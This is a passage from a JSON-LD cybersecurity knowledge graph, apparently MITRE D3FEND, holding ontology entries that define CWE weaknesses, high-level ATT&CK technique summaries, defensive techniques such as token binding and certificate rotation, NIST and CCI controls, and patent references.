      "d3f:definition": "x signed-by y: The digital artifact x includes a signature generated by the entity y, certifying the authenticity and integrity of x. This relationship indicates that x has undergone a validation process by y, using cryptographic measures to ensure that x is trustworthy and unaltered since the signing by y.",
      "owl:inverseOf": {
        "@id": "d3f:signs"
      },
      "rdfs:label": "signed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:validated-by"
      }
    },
    {
      "@id": "d3f:CCI-002614_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization installs organization-defined security-relevant firmware updates automatically to organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002614"
    },
    {
      "@id": "d3f:HMIApplicationProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The instructions within an HMI defined by user programming to interpret visual (and potentially audio) inputs and define visual (and potentially) audio outputs.",
      "rdfs:label": "HMI Application Process",
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:decodes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x decodes y: The entity x transforms data y to a different form, usually through decompression.",
      "rdfs:label": "decodes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:RemoteShellCommand",
      "@type": "owl:Class",
      "d3f:definition": "A remote shell command is a command sent from one computer to another to be executed on the remote computer.  One example of this, is through a command-line interface (CLI) like using Invoke-Command from PowerShell or a command sent through an ssh session. This class generalizes to all means of sending a command through an established protocol to control capabilities on a remote computer.",
      "rdfs:label": "Remote Shell Command",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Remote_Shell"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "d3f:CWE-38",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-38",
      "d3f:definition": "The product accepts input in the form of a backslash absolute path ('\\absolute\\pathname\\here') without appropriate validation, which can allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Traversal: '\\absolute\\pathname\\here'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-36"
      }
    },
    {
      "@id": "d3f:Reference-IdentificationOfVisualInternationalDomainNameCollisions-VerisignInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10599836B2/en"
      },
      "d3f:kb-abstract": "Fuzzy OCR to detect domain name homoglyph attacks.\n\nVarious embodiments of the invention disclosed herein provide techniques for detecting a homograph attack. An IDN collision detection server retrieves a first domain name that includes a punycode element. The IDN collision detection server converts the first domain into a second domain name that includes a Unicode character corresponding to the punycode element. The IDN collision detection server converts the second domain name into an image. The IDN collision detection server performs one or more optical character recognition operations on the image to generate a textual string associated with the image. The IDN collision detection server determines that the textual string matches at least a portion of a third domain name.",
      "d3f:kb-author": "Ben McCarty, Preston Zeh",
      "d3f:kb-mitre-analysis": "MITRE Analysis was not found.",
      "d3f:kb-organization": "Verisign Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:HomoglyphDetection"
      },
      "d3f:kb-reference-title": "Identification of visual international domain name collisions",
      "rdfs:label": "Reference - Identification of visual international domain name collisions - Verisign Inc"
    },
    {
      "@id": "d3f:CWE-1297",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1297",
      "d3f:definition": "The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors.",
      "rdfs:label": "Unprotected Confidential Information on Device is Accessible by OSAT Vendors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:BuildTool",
      "@type": "owl:Class",
      "d3f:definition": "A tool that automates the process of creating a software build and the associated processes including: compiling computer source code into binary code, packaging binary code, and running automated tests.",
      "rdfs:label": "Build Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Build_automation"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      },
      "skos:altLabel": "Build Automation Tool"
    },
    {
      "@id": "d3f:CCI-002661_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system monitors inbound communications traffic per organization-defined frequency for unusual or unauthorized activities or conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002661"
    },
    {
      "@id": "d3f:ReinforcementLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RL",
      "d3f:definition": "Reinforcement Learning is a subjugate technique of machine learning that uses feedback to reinforce good or valid rules and lessen the reliance of bad or ineffective rules",
      "d3f:kb-article": "## References\nReinforcement learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Reinforcement_learning).",
      "rdfs:label": "Reinforcement Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:LinuxRenameat2",
      "@type": "owl:Class",
      "d3f:definition": "Change the name or location of a file. Additional flags argument.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/renameat2.2.html"
      },
      "rdfs:label": "Linux Renameat2",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIMoveFile"
      }
    },
    {
      "@id": "d3f:loads",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x loads y: The technique or process x transfers a software from storage y to a computer's memory for subsequent execution.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02236692-v"
      },
      "rdfs:label": "loads",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-3_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Maintenance Tools | Restricted Tool Use",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "MA-3(4)"
    },
    {
      "@id": "d3f:has-audience",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-audience",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-use-case-object-property"
      }
    },
    {
      "@id": "d3f:CWE-325",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-325",
      "d3f:definition": "The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm.",
      "rdfs:label": "Missing Cryptographic Step",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:LocalAuthenticationService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:LocalUserAccount"
      },
      "d3f:definition": "A local authentication service running on a host can authenticate a user logged into just that local host computer.",
      "rdfs:label": "Local Authentication Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "_:N08b9013b0f3e494a91ccff636d52d250"
        }
      ]
    },
    {
      "@id": "_:N08b9013b0f3e494a91ccff636d52d250",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:ContentFormatConversion",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentFormatConversion"
      ],
      "d3f:d3fend-id": "D3-CFC",
      "d3f:definition": "Content format conversion is mechanical transformation from one format to another which may be normalization or specifically flattening.",
      "d3f:kb-article": "## How it works\n\nThis technique may enhance security by transforming files into safer or normalized formats.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "rdfs:label": "Content Format Conversion",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentModification"
      }
    },
    {
      "@id": "d3f:ApproximateStringMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ASM",
      "d3f:definition": "Approximate string matching is a form of string matching that allows errrors.",
      "d3f:kb-article": "## References\n1. Navarro, G. (2001). A guided tour to approximate string matching. _ACM Computing Surveys_, 33(1), 31-88. [Link](https://doi.org/10.1145/375360.375365)",
      "rdfs:label": "Approximate String Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PartialMatching"
      }
    },
    {
      "@id": "d3f:T1029",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1029",
      "d3f:definition": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Scheduled Transfer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N07bce3f06d874a948bb3046edd509f6a"
        }
      ]
    },
    {
      "@id": "_:N07bce3f06d874a948bb3046edd509f6a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CertificateRotation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CertificateRotation"
      ],
      "d3f:d3fend-id": "D3-CERO",
      "d3f:definition": "Certificate rotation involves replacing digital certificates and their private keys to maintain cryptographic integrity and trust, mitigating key compromise risks and ensuring continuous secure communications.",
      "d3f:kb-article": "## How it works\n\nCertificate rotation should be performed when:\n- Any certificate expires.\n- A new CA authority is substituted for the old, thus requiring a replacement root certificate.\n- New or modified constraints need to be imposed on one or more certificates.\n- A security breach has occurred.\n\nConsiderations:\n- Managing certificate rotation across an enterprise can be complex. Automated solutions, sold by multiple vendors, should be considered to manage this complexity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-PasswordandKeyRotation-SSH"
      },
      "d3f:regenerates": {
        "@id": "d3f:Certificate"
      },
      "rdfs:label": "Certificate Rotation",
      "rdfs:seeAlso": {
        "@id": "https://docs.couchbase.com/server/7.0/manage/manage-security/rotate-server-certificates.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialRotation"
        },
        {
          "@id": "_:Nc974fda545d84e18875d764fb8674f7e"
        }
      ]
    },
    {
      "@id": "_:Nc974fda545d84e18875d764fb8674f7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:regenerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:CWE-531",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-531",
      "d3f:definition": "Accessible test applications can pose a variety of security risks. Since developers or administrators rarely consider that someone besides themselves would even know about the existence of these applications, it is common for them to contain sensitive information or functions.",
      "rdfs:label": "Inclusion of Sensitive Information in Test Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-540"
      }
    },
    {
      "@id": "d3f:Reference-RemotelyTriggeredBlackHoleFiltering-Cisco",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisco.com/c/dam/en_us/about/security/intelligence/blackhole.pdf"
      },
      "d3f:kb-organization": "Cisco",
      "d3f:kb-reference-title": "Remotely Triggered Black Hole Filtering - Destination Based and Source Based",
      "rdfs:label": "Reference - Remotely Triggered Black Hole FIltering - Cisco"
    },
    {
      "@id": "d3f:CWE-1224",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1224",
      "d3f:definition": "The hardware design control register \"sticky bits\" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software.",
      "rdfs:label": "Improper Restriction of Write-Once Bit Fields",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1518.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1518.002",
      "d3f:definition": "Adversaries may attempt to get a listing of backup software or configurations that are installed on a system. Adversaries may use this information to shape follow-on behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).",
      "rdfs:label": "Backup Software Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:T1518"
      }
    },
    {
      "@id": "d3f:ActiveLogicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ActiveLogicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-ALLM",
      "d3f:definition": "Active logical link mapping sends and receives network traffic as a means to map the whole data link layer, where the links represent logical data flows rather than physical connections.",
      "d3f:kb-article": "## How it works\n\nActive logical link mapping establishes awareness of logical links in the network by sending data over the network to gather information about logical connections in the network.\n\nTypically this will be achieved through network telemetry coordinated for network management and monitoring and will use a link layer discovery protocol such as LLDP, with the information gathered and aggregated at higher levels using an application protocol such as SNMP.  The information may be polled by network management software or configured once and then pushed from network sensors (or agents).\n\nAnother means of establishing network connectivity is sending traffic with a tool such as traceroute to determine the logical paths through the network architecture.\n\n## Considerations\n\n* Best practice is to encrypt network monitoring data and require authentication for queries or admin/management functions.\n* Push notifications reduce bandwidth necessary to capture and maintain information if reliable transport is used.\n* Special consideration should be given before using active scanning in OT networks, and OT-safe options should be chosen where available.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IdentificationOfTracerouteNodesAndAssociatedDevices"
        },
        {
          "@id": "d3f:Reference-SNMPNetworkAutoDiscovery"
        }
      ],
      "d3f:may-query": {
        "@id": "d3f:NetworkAgent"
      },
      "rdfs:label": "Active Logical Link Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LogicalLinkMapping"
        },
        {
          "@id": "_:Nf36b42c63d3c4849807e7016a2d6a660"
        }
      ]
    },
    {
      "@id": "_:Nf36b42c63d3c4849807e7016a2d6a660",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-query"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkAgent"
      }
    },
    {
      "@id": "d3f:T1055.014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:attack-id": "T1055.014",
      "d3f:definition": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "VDSO Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:Nd0dc167e7fb340fe8213ff5e1b52ace7"
        },
        {
          "@id": "_:N63113c30809a4f7d9a084e0a3e79662a"
        }
      ]
    },
    {
      "@id": "_:Nd0dc167e7fb340fe8213ff5e1b52ace7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N63113c30809a4f7d9a084e0a3e79662a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-826",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-826",
      "d3f:definition": "The product releases a resource that is still intended to be used by itself or another actor.",
      "rdfs:label": "Premature Release of Resource During Expected Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-666"
      }
    },
    {
      "@id": "d3f:strengthens",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x strengthens y: The technique x makes digital artifact y resistant (to harm or misuse.)",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00165779-v"
      },
      "rdfs:label": "strengthens",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:M1049",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Process Analysis and subclasses.",
      "d3f:related": [
        {
          "@id": "d3f:FileContentRules"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        }
      ],
      "rdfs:label": "Antivirus/Antimalware"
    },
    {
      "@id": "d3f:ATTACKEnterpriseTactic",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Tactic",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKEnterpriseThing"
      }
    },
    {
      "@id": "d3f:OTDeleteDataCommand",
      "@type": "owl:Class",
      "d3f:definition": "OT command that removes data on a remote device.",
      "rdfs:comment": "BACnet: removeListElement\nBACnet: deleteObject",
      "rdfs:label": "OT Delete Data Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:may-access",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-access y: The entity x may access the thing y; that is, 'x accesses y' may be true.",
      "owl:inverseOf": {
        "@id": "d3f:may-be-accessed-by"
      },
      "rdfs:label": "may-access",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:SSHConnectionRefuseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that an SSH connection attempt was refused, typically due to server-side restrictions or closed ports.",
      "rdfs:label": "SSH Connection Refuse Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionRefuseEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        }
      ]
    },
    {
      "@id": "d3f:neutralizes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x neutralizes y: The technique x makes the execution of actions of y ineffective by preventing or counterbalancing the effect of y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00471015-v"
      },
      "rdfs:label": "neutralizes",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:T1036.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.012",
      "d3f:definition": "Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc.  The HTTP User-Agent request header is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting user agent.(Citation: Mozilla User Agent)",
      "rdfs:label": "Browser Fingerprint",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:T1563.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:RDPSession"
      },
      "d3f:attack-id": "T1563.002",
      "d3f:definition": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)",
      "rdfs:label": "RDP Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1563"
        },
        {
          "@id": "_:Nb7b2b78d88c648ebbc9ab9dc93942866"
        }
      ]
    },
    {
      "@id": "_:Nb7b2b78d88c648ebbc9ab9dc93942866",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPSession"
      }
    },
    {
      "@id": "d3f:OTDisconnectRemoteConnectionCommand",
      "@type": "owl:Class",
      "d3f:definition": "The Disconnect Request message is sent to the message receiver to indicate that the transmitter is terminating its TCP socket.",
      "rdfs:label": "OT Disconnect Remote Connection Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTConnectionCommand"
      }
    },
    {
      "@id": "d3f:T1217",
      "@type": "owl:Class",
      "d3f:attack-id": "T1217",
      "d3f:definition": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)",
      "rdfs:label": "Browser Information Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:T1142",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:EncryptedCredential"
      },
      "d3f:attack-id": "T1142",
      "d3f:definition": "Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>,<code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1555.001",
      "rdfs:label": "Keychain",
      "rdfs:seeAlso": {
        "@id": "d3f:T1555.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N48676d3e9b74416bac7eecce28b1745b"
        }
      ]
    },
    {
      "@id": "_:N48676d3e9b74416bac7eecce28b1745b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EncryptedCredential"
      }
    },
    {
      "@id": "d3f:T1053.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.002",
      "d3f:definition": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.",
      "rdfs:label": "At",
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Software and Firmware Integrity Verification",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PlatformHardening"
        }
      ],
      "rdfs:label": "SA-10(1)"
    },
    {
      "@id": "d3f:hardens",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x hardens y: The entity x fortifies entity y to reduce its weaknesses so y can better withstand attack or failure.",
      "rdfs:label": "hardens",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:counters"
        },
        {
          "@id": "d3f:d3fend-tactical-verb-property"
        }
      ]
    },
    {
      "@id": "d3f:may-evict",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may evict",
      "rdfs:label": "may-evict",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:may-counter"
        },
        {
          "@id": "d3f:may-counter-attack"
        }
      ]
    },
    {
      "@id": "d3f:CWE-14",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-14",
      "d3f:definition": "Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka \"dead store removal.\"",
      "rdfs:label": "Compiler Removal of Code to Clear Buffers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-733"
      }
    },
    {
      "@id": "d3f:TokenBinding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:TokenBinding"
      ],
      "d3f:d3fend-id": "D3-TB",
      "d3f:definition": "Token binding is a security mechanism used to enhance the protection of tokens, such as cookies or OAuth tokens, by binding them to a specific connection.",
      "d3f:kb-article": "## How it works\n\nWhen issuing a security token to a client that supports Token Binding, a server includes the client's Token Binding ID (or its cryptographic hash) in the token. Later on, when a client presents a security token containing a Token Binding ID, the server verifies that the ID in the token matches the ID of the Token Binding established with the client. In the case of a mismatch, the server rejects the token.\n\n## Considerations\n\n- While industry participation in the standards process is widespread, browser support remains limited.\n- In practice, token-binding implementations are tied to Transport Layer Security (TLS).",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-RFC8471TheTokenBindingProtocolVersion1.0"
      },
      "d3f:strengthens": {
        "@id": "d3f:AccessToken"
      },
      "rdfs:label": "Token Binding",
      "rdfs:seeAlso": {
        "@id": "dbr:Token_Binding"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialHardening"
        },
        {
          "@id": "_:N27e5c385a19741cd9243ff61363e217a"
        }
      ]
    },
    {
      "@id": "_:N27e5c385a19741cd9243ff61363e217a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:CWE-1088",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1088",
      "d3f:definition": "The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite.",
      "rdfs:label": "Synchronous Access of Remote Resource without Timeout",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-821"
      }
    },
    {
      "@id": "d3f:DomainName",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A domain name is an identification string that defines a realm of administrative autonomy, authority or control within the Internet. Domain names are formed by the rules and procedures of the Domain Name System (DNS). Any name registered in the DNS is a domain name. Domain names are used in various networking contexts and application-specific naming and addressing purposes. In general, a domain name represents an Internet Protocol (IP) resource, such as a personal computer used to access the Internet, a server computer hosting a web site, or the web site itself or any other service communicated via the Internet. In 2015, 294 million domain names had been registered.",
      "d3f:identifies": {
        "@id": "d3f:IPAddress"
      },
      "rdfs:label": "Domain Name",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:Nf69199cf432e4c2f96188aa756f689a1"
        }
      ]
    },
    {
      "@id": "_:Nf69199cf432e4c2f96188aa756f689a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IPAddress"
      }
    },
    {
      "@id": "d3f:T1514",
      "@type": "owl:Class",
      "d3f:attack-id": "T1514",
      "d3f:definition": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating.  This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.004",
      "rdfs:label": "Elevated Execution with Prompt",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:DHCPOfferEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP server sends an OFFER message to a client in response to a DISCOVER request, proposing an IP address and associated configuration parameters.",
      "rdfs:label": "DHCP Offer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N59f110c6fa6b4ab6b62bdba870998090"
        }
      ],
      "skos:altLabel": "DHCPOFFER"
    },
    {
      "@id": "_:N59f110c6fa6b4ab6b62bdba870998090",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPDiscoverEvent"
